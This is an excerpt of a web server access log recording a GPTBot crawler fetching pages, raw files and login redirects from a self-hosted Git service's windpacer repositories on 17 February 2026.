[Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 9847] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9804] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 11769] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 709] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 252268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:17:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:17:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:35:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:17:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10963685] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:17:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:17:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:36:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:36:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" -[17/Feb/2026:17:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:17:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 323010] [Gzip 27.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14682] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 12001] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 22752] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14652] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11113] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:17:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14173] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:36:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/main.py" -[17/Feb/2026:17:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/main.py" -[17/Feb/2026:17:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/main.py" -[17/Feb/2026:17:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/main.py" -[17/Feb/2026:17:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:17 +0000] - 200 200 - GET https 